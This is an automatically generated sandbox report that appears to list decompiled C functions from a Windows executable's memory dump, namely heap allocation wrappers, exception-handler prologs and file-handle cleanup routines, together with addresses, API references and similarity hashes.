0x008391e4
0x008391ec
0x008391ec
0x008391f0
0x008391f9
0x00839200
0x00839201
0x00839203
0x00839203
0x00839205
0x0083920b
0x00839213
0x00839215
0x0083921a
0x0083921e
0x00839227
0x00839231

APIs

__EH_prolog.LIBCMT ref: 008391A8

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 85065f6acd5f6bdc4ab0f442112ec6a08d983bb3d9c9b4b564c77cf5dc4244a5
Instruction ID: 8b028727187379e1b9b0fcd9a1233aa976d369f08e336bc0003fc2ed14c6f0f7
Opcode Fuzzy Hash: 85065f6acd5f6bdc4ab0f442112ec6a08d983bb3d9c9b4b564c77cf5dc4244a5
Instruction Fuzzy Hash: 9B115A77E00529ABCF22AAACCC559EEB736FBC8710F014126F815F7252CA798D1087E1

Uniqueness

Uniqueness Score: -1.00%

Function 0084C755, Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0084C755(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				intOrPtr _t18;
				char _t19;
				char _t20;
				void* _t23;
				void* _t24;
				void* _t37;
				void* _t43;
				intOrPtr _t45;

				_t37 = __edx;
				E0084D8C4(E008615AE, __ecx);
				_push(__ecx);
				E0084D9C0();
				_push(_t24);
				 *((intOrPtr*)(_t43 - 0x10)) = _t45;
				E00854DC3(0x8839fa, "X");
				E0083FB3E(0x885a1c, _t37, 0x8622e0);
				E00854DC3(0x884a1a,  *((intOrPtr*)(_t43 + 0xc)));
				E00835BAF(0x87b708, _t37,  *((intOrPtr*)(_t43 + 0xc)));
				_t4 = _t43 - 4;
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				_t18 = 2;
				 *0x8829d8 = _t18;
				 *0x8829d4 = _t18;
				 *0x8829d0 = _t18;
				_t19 =  *0x8775f1; // 0x0
				 *0x88185b = _t19;
				_t20 =  *0x8775f2; // 0x1
				 *0x881894 = 1;
				 *0x881897 = 1;
				 *0x88185c = _t20;
				E00837B7B(_t43 - 0x2108, _t37,  *_t4, 0x87b708);
				 *(_t43 - 4) = 1;
				E00837CF1(_t43 - 0x2108, _t37,  *_t4);
				_t23 = E00837C0D(_t24, _t43 - 0x2108, _t37); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
				return _t23;
			}

0x0084c755
0x0084c75a
0x0084c75f
0x0084c765
0x0084c76a
0x0084c76d
0x0084c77a
0x0084c78b
0x0084c798
0x0084c7a9
0x0084c7ae
0x0084c7ae
0x0084c7ba
0x0084c7bb
0x0084c7c0
0x0084c7c5
0x0084c7ca
0x0084c7cf
0x0084c7d4
0x0084c7da
0x0084c7e1
0x0084c7e8
0x0084c7ed
0x0084c7f8
0x0084c7fc
0x0084c807
0x0084c811
0x0084c81c

APIs

__EH_prolog.LIBCMT ref: 0084C75A

Part of subcall function 00837B7B: __EH_prolog.LIBCMT ref: 00837B80
Part of subcall function 00837B7B: new.LIBCMT ref: 00837BC4

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: aab9fe9c7c6f6e70dff33cca1514929a0482945302e15bf6f6bb8f8eb192e17e
Instruction ID: 5e18f2671b966d89ac6209f5126cd5ac2610d08e4a84b10904e0e8c5eb7db56e
Opcode Fuzzy Hash: aab9fe9c7c6f6e70dff33cca1514929a0482945302e15bf6f6bb8f8eb192e17e
Instruction Fuzzy Hash: 5E11EB71508244AED704EB5CDC1BBDC7FB4FB65310F0001AAF419E6283DBB50685CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0085B136, Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0085B136(void* __edx, void* __esi, void* __eflags) {
				intOrPtr _v12;
				void* __ecx;
				char _t16;
				void* _t17;
				void* _t26;
				void* _t28;
				void* _t31;
				char _t32;
				void* _t34;
				intOrPtr* _t36;

				_push(_t26);
				_push(_t26);
				_t16 = E00857B91(_t26, 0x40, 0x30); // executed
				_t32 = _t16;
				_v12 = _t32;
				_t28 = _t31;
				if(_t32 != 0) {
					_t2 = _t32 + 0xc00; // 0xc00
					_t17 = _t2;
					__eflags = _t32 - _t17;
					if(__eflags != 0) {
						_t3 = _t32 + 0x20; // 0x20
						_t36 = _t3;
						_t34 = _t17;
						do {
							_t4 = _t36 - 0x20; // 0x0
							E00859C5D(_t28, _t36, __eflags, _t4, 0xfa0, 0);
							 *(_t36 - 8) =  *(_t36 - 8) | 0xffffffff;
							 *_t36 = 0;
							_t36 = _t36 + 0x30;
							 *((intOrPtr*)(_t36 - 0x2c)) = 0;
							 *((intOrPtr*)(_t36 - 0x28)) = 0xa0a0000;
							 *((char*)(_t36 - 0x24)) = 0xa;
							 *(_t36 - 0x23) =  *(_t36 - 0x23) & 0x000000f8;
							 *((char*)(_t36 - 0x22)) = 0;
							__eflags = _t36 - 0x20 - _t34;
						} while (__eflags != 0);
						_t32 = _v12;
					}
				} else {
					_t32 = 0;
				}
				E00857AC6(0);
				return _t32;
			}

0x0085b13b
0x0085b13c
0x0085b143
0x0085b148
0x0085b14c
0x0085b150
0x0085b153
0x0085b159
0x0085b159
0x0085b15f
0x0085b161
0x0085b164
0x0085b164
0x0085b167
0x0085b169
0x0085b16f
0x0085b173
0x0085b178
0x0085b17c
0x0085b17e
0x0085b181
0x0085b187
0x0085b18e
0x0085b192
0x0085b196
0x0085b199
0x0085b199
0x0085b19d
0x0085b1a0
0x0085b155
0x0085b155
0x0085b155
0x0085b1a2
0x0085b1af

APIs

Part of subcall function 00857B91: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0085859F,00000001,00000364,?,00852E6F,?,?,008700E0), ref: 00857BD2

_free.LIBCMT ref: 0085B1A2

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 43862b2291c0c1e582d332359441da1e8c9a88ae3b8bef17d846f6759a6f0a85
Instruction ID: 24267ee0db23ed822c985fbe794a0fd77ce605fa2be0764e705a2be30745658a
Opcode Fuzzy Hash: 43862b2291c0c1e582d332359441da1e8c9a88ae3b8bef17d846f6759a6f0a85
Instruction Fuzzy Hash: CC012672240304ABE331CE69DC8195AFBD9FB95371F25052DE994C3280EB30A8098A65

Uniqueness

Uniqueness Score: -1.00%

Function 0083A7CC, Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0083A7CC(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* __esi;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t16;
				intOrPtr* _t22;

				_push(__ecx);
				_t22 = __ecx;
				_t24 =  *((intOrPtr*)(__ecx + 8));
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					_t15 = E0084D880(__edx, __ecx, _t24, 0xb54); // executed
					_v8 = _t15;
					_t25 = _t15;
					if(_t15 == 0) {
						_t16 = 0;
						__eflags = 0;
					} else {
						_t16 = E0083A65F(_t15, _t25);
					}
					 *((intOrPtr*)(_t22 + 8)) = _t16;
				}
				_t12 = _a4;
				 *_t22 = _t12;
				if(_t12 == 1) {
					 *(_t22 + 4) =  *(_t22 + 4) & 0x00000000;
				}
				if(_t12 == 2) {
					 *(_t22 + 4) =  *(_t22 + 4) | 0xffffffff;
				}
				if(_t12 == 3) {
					E00835908( *((intOrPtr*)(_t22 + 8)));
				}
				_t13 = _a8;
				if(_t13 >= 8) {
					_t13 = 8;
				}
				 *((intOrPtr*)(_t22 + 0x10)) = _t13;
				return _t13;
			}

0x0083a7cf
0x0083a7d1
0x0083a7d3
0x0083a7d7
0x0083a7de
0x0083a7e3
0x0083a7e7
0x0083a7e9
0x0083a7f4
0x0083a7f4
0x0083a7eb
0x0083a7ed
0x0083a7ed
0x0083a7f6
0x0083a7f6
0x0083a7f9
0x0083a7fc
0x0083a801
0x0083a803
0x0083a803
0x0083a80a
0x0083a80c
0x0083a80c
0x0083a813
0x0083a818
0x0083a818
0x0083a81d
0x0083a823
0x0083a827
0x0083a827
0x0083a828
0x0083a82f

APIs

new.LIBCMT ref: 0083A7DE

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f5fec0c36bbc145cb67a0e62e1ecb79f5c2867a708c15a5e5143fdd4c660255
Instruction ID: 67c884b38f331e56bac18d7ab28628bdcf5bd1c55efdb690bc6eec1194a59fcd
Opcode Fuzzy Hash: 6f5fec0c36bbc145cb67a0e62e1ecb79f5c2867a708c15a5e5143fdd4c660255
Instruction Fuzzy Hash: 73F03C319147099EDB38DA28C88172A77E4FB65321F208E2AE4D5C7690EB70D98587D2

Uniqueness

Uniqueness Score: -1.00%

Function 00857B91, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00857B91(void* __ecx, signed int _a4, signed int _a8) {
				void* __esi;
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t16;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x890874, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E0085797C();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00857F42())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E008567A8(_t15, _t16, _t19, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t16 = _t13 % _t18;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00857b91
0x00857b97
0x00857b9c
0x00857baa
0x00857baa
0x00857bb0
0x00857bb2
0x00857bb2
0x00857bc9
0x00857bd2
0x00857bda
0x00000000
0x00000000
0x00857bba
0x00857bbc
0x00857bde
0x00857be3
0x00857be9
0x00000000
0x00857be9
0x00857bbf
0x00857bc4
0x00857bc5
0x00857bc7
0x00000000
0x00000000
0x00857bc7
0x00000000
0x00857bc9
0x00857ba2
0x00857ba3
0x00857ba8
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0085859F,00000001,00000364,?,00852E6F,?,?,008700E0), ref: 00857BD2

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1996c70ce8d303406592304543f82a12b798278efeb53e9b7d7b8c2c5206b773
Instruction ID: debd2d3d01435a12415e1ceeb271f515c798e7681a654d652d9d0ca0ddca6aa3
Opcode Fuzzy Hash: 1996c70ce8d303406592304543f82a12b798278efeb53e9b7d7b8c2c5206b773
Instruction Fuzzy Hash: C6F0BE3120C5296BAB216A26BD05F5A3B9DFF41772B29C572AC09E6184CA30D80886E3

Uniqueness

Uniqueness Score: -1.00%

Function 00857B00, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00857B00(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00857F42())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x890874, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E0085797C();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E008567A8(_t7, _t8, _t9, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00857b00
0x00857b06
0x00857b0c
0x00857b3e
0x00857b43
0x00857b49
0x00000000
0x00857b49
0x00857b10
0x00857b12
0x00857b12
0x00857b29
0x00857b32
0x00857b3a
0x00000000
0x00000000
0x00857b1a
0x00857b1c
0x00000000
0x00000000
0x00857b1f
0x00857b24
0x00857b25
0x00857b27
0x00000000
0x00000000
0x00857b27
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00853006,?,0000015D,?,?,?,?,008544E2,000000FF,00000000,?,?), ref: 00857B32

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5106db5f530625abbda1aeb11b44931db9eeaf1a096b26294f004591c27a1fac
Instruction ID: 3c46a49c47045704337fd13deb213213e2772c398df22885da5c8a3c5d855b17
Opcode Fuzzy Hash: 5106db5f530625abbda1aeb11b44931db9eeaf1a096b26294f004591c27a1fac
Instruction Fuzzy Hash: 67E0E53120911557DA212625BC05B5A764DFF413B3F558122AC15E2090DB21CC0883E3

Uniqueness

Uniqueness Score: -1.00%

Function 00835B2D, Relevance: 1.5, APIs: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00835B2D(intOrPtr __ecx, void* __eflags) {
				void* _t36;

				E0084D8C4(E0086129A, __ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t36 - 0x10)) = __ecx;
				E0083ADBF(__ecx); // executed
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				E0083FB1C();
				 *(_t36 - 4) = 1;
				E0083FB1C();
				 *(_t36 - 4) = 2;
				E0083FB1C();
				 *(_t36 - 4) = 3;
				E0083FB1C();
				 *(_t36 - 4) = 4;
				E0083FB1C();
				 *(_t36 - 4) = 5;
				E00835D22(__ecx,  *(_t36 - 4));
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return __ecx;
			}

0x00835b32
0x00835b37
0x00835b3b
0x00835b3e
0x00835b43
0x00835b4d
0x00835b58
0x00835b5c
0x00835b67
0x00835b6b
0x00835b76
0x00835b7a
0x00835b85
0x00835b89
0x00835b90
0x00835b94
0x00835b9f
0x00835ba9

APIs

__EH_prolog.LIBCMT ref: 00835B32

Part of subcall function 0083ADBF: __EH_prolog.LIBCMT ref: 0083ADC4

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: b58312a3043c1b43fb403dd2e195b692de619c2dff291cf839925918df8385ef
Instruction ID: 49418d2ec8ded59afa4702923127376055f892949a57253b47fb8773c860bcb8
Opcode Fuzzy Hash: b58312a3043c1b43fb403dd2e195b692de619c2dff291cf839925918df8385ef
Instruction Fuzzy Hash: B0016DB0A05694DAD715E7ACE1263EDF7A4EF55314F0008ADB549D3283DBB82B0487E3

Uniqueness

Uniqueness Score: -1.00%

Function 00839572, Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00839572(void* __ecx) {
				void* _t16;
				void* _t21;

				_t21 = __ecx;
				_t16 = 1;
				if( *(__ecx + 4) != 0xffffffff) {
					if( *((char*)(__ecx + 0x10)) == 0 &&  *((intOrPtr*)(__ecx + 0xc)) == 0) {
						_t5 = FindCloseChangeNotification( *(__ecx + 4)) - 1; // -1
						asm("sbb bl, bl");
						_t16 =  ~_t5 + 1;
					}
					 *(_t21 + 4) =  *(_t21 + 4) | 0xffffffff;
				}
				 *(_t21 + 0xc) =  *(_t21 + 0xc) & 0x00000000;
				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x14)) != _t16) {
					E00836D95(0x8700e0, _t21 + 0x1e);
				}
				return _t16;
			}

0x00839574
0x00839576
0x0083957c
0x00839582
0x00839593
0x00839598
0x0083959a
0x0083959a
0x0083959c
0x0083959c
0x008395a0
0x008395a6
0x008395b6
0x008395b6
0x008395bf

APIs

FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00839542), ref: 0083958D

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 4f78d0e74e8a84d16b10d7e9279f71c7c56621e6d0c1013b5cfd31aca51ee220
Instruction ID: 9fce24a7fa17cf7955d31846eedf435d499864e96cda0791ae6c454201859dd7
Opcode Fuzzy Hash: 4f78d0e74e8a84d16b10d7e9279f71c7c56621e6d0c1013b5cfd31aca51ee220
Instruction Fuzzy Hash: E6F08270442B049EEB319B24C549792B7E4FB56731F048B1ED0EAC35E0D3A1A88DCF91

Uniqueness

Uniqueness Score: -1.00%

Function 0083A255, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0083A255(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _t12;
				intOrPtr _t20;

				_t20 = _a8;
				 *((char*)(_t20 + 0x1044)) = 0;
				if(E0083B682(_a4) == 0) {
					_t12 = E0083A383(__edx, 0xffffffff, _a4, _t20);
					if(_t12 == 0xffffffff) {
						goto L1;
					}
					FindClose(_t12); // executed
					 *(_t20 + 0x1040) =  *(_t20 + 0x1040) & 0x00000000;
					 *((char*)(_t20 + 0x100c)) = E00839F71( *((intOrPtr*)(_t20 + 0x1008)));
					 *((char*)(_t20 + 0x100d)) = E00839F89( *((intOrPtr*)(_t20 + 0x1008)));
					return 1;
				}
				L1:
				return 0;
			}

0x0083a256
0x0083a25e
0x0083a26c
0x0083a279
0x0083a281
0x00000000
0x00000000
0x0083a284
0x0083a290
0x0083a2a2
0x0083a2ad
0x00000000
0x0083a2b3
0x0083a26e
0x00000000

APIs

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0083A284

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: e0ae17dc0d0a1be270f3b0cc739d0feca79afda458cda54b72f116b171e63ccf
Instruction ID: e73e0a0408fe23a365fb1f2eca1b7e85b15d7b7fda2c652ea6466bc228949352
Opcode Fuzzy Hash: e0ae17dc0d0a1be270f3b0cc739d0feca79afda458cda54b72f116b171e63ccf
Instruction Fuzzy Hash: 23F0E93100D780AACB2267B8C804BC77B95FF95331F048A49F5FEC2192C2B6548987A3

Uniqueness

Uniqueness Score: -1.00%

Function 00831E9F, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00831E9F(intOrPtr* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _t14;
				void* _t23;

				E0084D8C4(E00861201, __ecx);
				_t14 =  *((intOrPtr*)(__ecx + 0x21bc));
				if( *((char*)(_t14 + 0x6152)) == 0) {
					 *((intOrPtr*)(_t23 - 0x20)) = 0;
					 *((intOrPtr*)(_t23 - 0x1c)) = 0;
					 *((intOrPtr*)(_t23 - 0x18)) = 0;
					 *((intOrPtr*)(_t23 - 0x14)) = 0;
					 *((char*)(_t23 - 0x10)) = 0;
					 *((intOrPtr*)(_t23 - 4)) = 0;
					_t9 = _t23 - 0x20; // 0x7e0
					E00831906(__ecx, __edx, __esi, _t9);
					_t10 = _t23 - 0x20; // 0x7e0
					_t14 = E008315D4(_t10);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t23 - 0xc));
				return _t14;
			}

0x00831ea4
0x00831ea9
0x00831eb9
0x00831ebd
0x00831ec0
0x00831ec3
0x00831ec6
0x00831ec9
0x00831ecc
0x00831ecf
0x00831ed3
0x00831ed8
0x00831edb
0x00831edb
0x00831ee3
0x00831eed

APIs

__EH_prolog.LIBCMT ref: 00831EA4

Part of subcall function 00831906: __EH_prolog.LIBCMT ref: 0083190B

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 660d9f42780044e2b4eb9f63d4ed0c933cab3839942d75c69dfc364f94ff1a97
Instruction ID: d091c49f2beea6a00af7f6f085dccb3dc9dc00d0dd23c0d50dc35e5501470a28
Opcode Fuzzy Hash: 660d9f42780044e2b4eb9f63d4ed0c933cab3839942d75c69dfc364f94ff1a97
Instruction Fuzzy Hash: 4DF098B1D042498ECF41DFECC5496EDBBB1FB59701F0445BAD409E7202E7355644CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00831EA4, Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00831EA4(intOrPtr* __ecx, intOrPtr __edx, void* __esi) {
				void* _t12;
				intOrPtr _t14;
				void* _t23;

				E0084D8C4(_t12, __ecx);
				_t14 =  *((intOrPtr*)(__ecx + 0x21bc));
				if( *((char*)(_t14 + 0x6152)) == 0) {
					 *((intOrPtr*)(_t23 - 0x20)) = 0;
					 *((intOrPtr*)(_t23 - 0x1c)) = 0;
					 *((intOrPtr*)(_t23 - 0x18)) = 0;
					 *((intOrPtr*)(_t23 - 0x14)) = 0;
					 *((char*)(_t23 - 0x10)) = 0;
					 *((intOrPtr*)(_t23 - 4)) = 0;
					_t9 = _t23 - 0x20; // 0x7e0
					E00831906(__ecx, __edx, __esi, _t9);
					_t10 = _t23 - 0x20; // 0x7e0
					_t14 = E008315D4(_t10);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t23 - 0xc));
				return _t14;
			}

0x00831ea4
0x00831ea9
0x00831eb9
0x00831ebd
0x00831ec0
0x00831ec3
0x00831ec6
0x00831ec9
0x00831ecc
0x00831ecf
0x00831ed3
0x00831ed8
0x00831edb
0x00831edb
0x00831ee3
0x00831eed

APIs

__EH_prolog.LIBCMT ref: 00831EA4

Part of subcall function 00831906: __EH_prolog.LIBCMT ref: 0083190B

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 227b414101ecef702655c4b24e983e4544fb90e92d0f7a3ba207c890273304ee
Instruction ID: 0cd86f9ab12e70c9b356b74b9b62cab3b413c20cc4eccb6feb3d0a5141056137
Opcode Fuzzy Hash: 227b414101ecef702655c4b24e983e4544fb90e92d0f7a3ba207c890273304ee
Instruction Fuzzy Hash: 2BF092B1D042898ECF41DFA8C5496EEBBB1FB58700F0445BAD809E7202EB355604CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 008402FF, Relevance: 1.5, APIs: 1, Instructions: 21
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E008402FF() {
				void* __esi;
				void* _t2;

				E00840FD7(); // executed
				_t2 = E00840FDC();
				if(_t2 != 0) {
					_t2 = E00836DE3(_t2, 0x8700e0, 0xff, 0xff);
				}
				if( *0x8700eb != 0) {
					_t2 = E00836DE3(_t2, 0x8700e0, 0xff, 0xff);
				}
				__imp__SetThreadExecutionState(1);
				return _t2;
			}

0x00840301
0x00840306
0x00840317
0x0084031c
0x0084031c
0x00840328
0x0084032d
0x0084032d
0x00840334
0x0084033c

APIs

SetThreadExecutionState.KERNEL32 ref: 00840334

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
